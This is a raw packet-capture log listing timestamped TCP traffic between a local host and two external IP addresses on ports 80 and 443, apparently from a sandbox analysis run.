Dec 18, 2024 13:38:39.369548082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.369576931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.370511055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.370524883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.370582104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.371519089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.371531010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.371567011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.371598005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.372495890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.372508049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.372559071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.373475075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.373486996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.373522043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.373542070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.374428034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.374480009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.374506950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.374547958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.375462055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.375473976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.375519037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.376454115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.376466990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.376512051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.377446890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.377460003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.377501965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.378458977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.378473043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.378520966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.379467010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.379482985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.379519939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.379543066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.380444050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.380491018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.380517006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.381541014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.381553888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.381607056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.382430077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.382492065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.383490086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.383502960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.383514881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.383550882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.383579016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.384522915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.384535074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.384581089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.385571957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.385584116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.385627031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.386523962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.386534929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.386576891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.386600971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.387475967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.387495041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.387542009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.388503075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.388515949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.388551950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.388583899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.389514923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.389528036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.389585018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.389616013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.390579939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.390590906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.390641928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.391686916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.391697884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.391746998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.392775059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.392787933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.392831087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.393982887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.393996000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.394047976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.394958973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.395009041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.395015955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.395052910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.396080971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.396095037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.396105051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.396138906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.396174908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.397181988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.397195101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.397232056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.397262096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.398272991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.398293018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.398323059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.398339033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.399816990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.399830103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.399866104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.399879932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.401194096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.401206970 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.401262999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.402966976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.402980089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.402991056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.403028965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.403059006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.403884888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.403898001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.403938055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.404836893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.404854059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.404880047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.404906988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.406059027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.406073093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.406116009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.406933069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.406944036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.406955004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.406989098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.407000065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.407860994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.407875061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.407922029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.433914900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.434143066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.434192896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.434329033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.434370995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.434869051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.434912920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.435549974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.435591936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.435880899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.436515093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.436557055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.436918020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.437185049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.437453032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.437505007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.437905073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.437956095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.438530922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.438544989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.438581944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.439718008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.440164089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.440207958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.440408945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.440454006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.554003954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.554198980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.554303885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.554358959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.554791927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.554843903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.555377007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.555424929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.555911064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.555924892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.555963993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.556268930 CET	49719	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:39.557028055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.557332039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.557344913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.557391882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.558163881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.558221102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.558671951 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.558717966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.559150934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.559164047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.559202909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.560173988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.560240030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.560605049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.560668945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.561172009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.561183929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.561224937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.562129021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.562140942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.562187910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.563103914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.563116074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.563158035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.564133883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.564146042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.564191103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.565085888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.565098047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.565150023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.566097975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.566112995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.566152096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.567281961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.567295074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.567359924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.568027973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.568084955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.568118095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.568140030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.569073915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.569114923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.569130898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.569164038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.570086956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.570099115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.570195913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.571027994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.571039915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.571089983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.572021008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.572035074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.572081089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.573116064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.573128939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.573179007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.573985100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.573997021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.574045897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.575112104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.575124979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.575172901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.576158047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.576170921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.576236963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.577164888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.577177048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.577224016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.578372002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.578383923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.578429937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.579479933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.579493046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.579536915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.580118895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.580131054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.580178976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.581116915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.581129074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.581181049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.582103014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.582115889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.582164049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.583139896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.583153009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.583198071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.584192038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.584204912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.584252119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.585302114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.585314035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.585365057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.586404085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.586417913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.586463928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.588609934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.588620901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.588671923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.589715958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.589728117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.589785099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.590816021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.590827942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.590874910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.591943026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.591955900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.592005014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.592969894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.593019962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.593019962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.593080044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.594099998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.594111919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.594122887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.594161987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.594196081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.595169067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.595180988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.595230103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.596352100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.596364021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.596405029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.597387075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.597400904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.597439051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.598529100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.598541975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.598583937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.599730968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.599742889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.599754095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.599781990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.599797964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.600728989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.600740910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.600749969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.600780964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.600806952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.626161098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.626225948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.626353025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.626404047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.626847982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.626899958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.627074003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.627120972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.627644062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.627702951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.629060984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.629116058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.630147934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.630160093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.630171061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.630213022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.631128073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.631141901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.631190062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.632107019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.632118940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.632152081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.632179022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.636674881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.636723995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.758182049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.758373022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.758407116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.758461952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.758595943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.758650064 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.759026051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.759079933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.759602070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.759654045 CET	49715	80	192.168.2.8	31.41.244.11
